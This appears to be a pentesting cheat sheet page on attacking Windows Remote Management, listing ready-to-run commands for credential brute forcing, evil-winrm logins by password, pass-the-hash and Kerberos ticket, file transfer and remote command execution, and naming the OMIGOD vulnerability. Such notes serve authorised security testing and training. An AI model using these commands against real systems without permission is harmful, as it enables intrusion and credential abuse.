WinRM (Windows Remote Management) Pentesting

The Microsoft implementation of WS-Management Protocol which provides a common way for systems to access and exchange management information across an IT infrastructure. Default ports are 5985 (HTTP), 5986 (HTTPS), and also used 47001.

Enumeration

Brute Force Credentials

netexec winrm <target-ip> -d DOMAIN -u usernames.txt -p passwords.txt 

# Metasploit
msfconsole
msf > use auxiliary/scanner/winrm/winrm_login

Connect

Evil-WinRM is a Windows Remote Management shell for pentesting. Below are list of commands for each situation.

Using Username/Password

evil-winrm -i <target-ip> -u username -p password
# -P: Specifify port
evil-winrm -i <target-ip> -P 5986 -u username -p password

# Pass The Hash (-H)
evil-winrm -i <target-ip> -P 5986 -u username -H 0e0363213e37b94221497260b0bcb4fc

# PowerShell Local Path (-s)
evil-winrm -i <target-ip> -u username -p password -s /opt/scripts

# SSL enabled (-S)
evil-winrm -i <target-ip> -u username -p password -S

If you have private key and public key, you can use them for authentication.

# -S: SSL
# -k: private key
# -c: public key
evil-winrm -i <target-ip> -S -k private.key -c public.key

Using Kerberos Authentication

If we have a Kerberos ticket of a user, we can login with its ticket, but some settings are required. At first, we need to modify the nameserver value in the /etc/resolv.conf in our attack machine.

nameserver <target-ip>

and modify /etc/krb5.conf (or create a new one if it does not exist) in our attack machine as below:

[libdefaults]
    default_realm = EXAMPLE.LOCAL
    dns_lookup_realm = true
    dns_lookup_kdc = true

[realms]
    EXAMPLE.LOCAL = {
        kdc = dc.example.local
        admin_server = dc.example.local
        default_domain = example.local
    }

[domain_realm]
    example.local = EXAMPLE.LOCAL
    .example.local = EXAMPLE.LOCAL

Note that example.local and dc.example.local must be added to /etc/hosts. Now set the environment variable and login with evil-winrm:

export KRB5CCNAME=<username>.ccache
evil-winrm -i dc.example.local -r example.local

Commands

After connecting with evil-winrm, we can use a lot of useful commands to exploit. Note that we need to specify the absolute path for uploading and downloading.

# Upload a local file to Windows machine
PS> upload ./example.bat c:\\Users\Administrator\Desktop\exploit.bat
# Download a file to local
PS> download c:\\Users\Administrator\Desktop\example.txt ./example.txt

# List all services
PS> services

Command Execution with NetExec

# -x: Execute a command
netexec winrm <target-ip> -d DOMAIN -u username -p password -x 'whoami'
netexec winrm <target-ip> -d DOMAIN -u username -p password -X '$PSVersionTable'

# -H: Login with Pass The Hash
netexec winrm <target-ip> -d DOMAIN -u username -H <HASH> -x 'whoami'

OMIGOD (CVE-2021-38647)

Open Management Infrastructure (OMI) is vulnerable to Remote Code Execution (RCE).

There are many PoC available, for instance:

References

Microsoft

PreviousRDP (Remote Desktop Protocol) Pentesting NextLDAP Injection

Last updated 1 month ago

hashtagEnumeration

hashtagBrute Force Credentials

hashtagConnect

hashtagUsing Username/Password

hashtagUsing Kerberos Authentication

hashtagCommands

hashtagCommand Execution with NetExec

hashtagOMIGOD (CVE-2021-38647)

hashtagReferences